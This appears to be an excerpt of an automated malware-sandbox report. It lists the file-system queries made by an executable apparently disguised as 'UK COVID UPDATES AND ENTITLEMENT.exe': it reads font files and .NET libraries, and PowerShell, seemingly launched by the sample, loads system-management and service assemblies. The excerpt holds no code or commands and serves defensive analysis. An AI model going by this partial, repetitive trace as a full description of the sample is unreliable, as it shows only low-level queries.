Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
